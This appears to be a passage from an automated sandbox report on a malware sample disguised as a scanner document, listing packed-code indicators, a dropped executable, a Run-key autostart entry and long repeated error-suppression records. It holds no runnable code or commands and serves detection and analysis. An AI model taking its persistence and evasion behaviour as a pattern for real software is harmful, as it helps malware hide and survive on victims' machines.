C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF3C94 push edi; ret 4_2_00AF3D64 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF39E8 push edi; ret 4_2_00AF3AB8 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF2DE2 push edi; ret 4_2_00AF2FFC Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF50F8 push edi; ret 4_2_00AF51C8 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF5FF4 push edi; ret 4_2_00AF60C4 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF62D8 push edi; ret 4_2_00AF63A8 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF2A20 push edi; ret 4_2_00AF2AF0 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF220C push edi; ret 4_2_00AF22DC Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF3E02 push edi; ret 4_2_00AF3F8C Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF2718 push edi; ret 4_2_00AF27E8 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF6162 push edi; ret 4_2_00AF61D0 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4_2_00AF2C74 push edi; ret 4_2_00AF2D44 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_004181D8 push esi; retf 5_2_004181DA Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00419A35 push eax; ret 5_2_00419A88 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 5_2_00419AEC push eax; ret 5_2_00419AF2
 Binary may include packed or encrypted code Show sources
 Source: initial sample Static PE information: section name: .text entropy: 7.91221465963 Source: initial sample Static PE information: section name: .text entropy: 7.91221465963

#### Persistence and Installation Behavior:

 Drops PE files Show sources
 Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Uchul\Cookies7n1p8js.exe Jump to dropped file

#### Boot Survival:

 Creates an autostart registry key Show sources
 Source: C:\Windows\SysWOW64\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EFG4WJ Jump to behavior Source: C:\Windows\SysWOW64\wscript.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run EFG4WJ Jump to behavior

#### Hooking and other Techniques for Hiding and Protection:

 Disables application error messsages (SetErrorMode) Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Process information set: NOOPENFILEERRORBOX Jump to behavior Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Source: 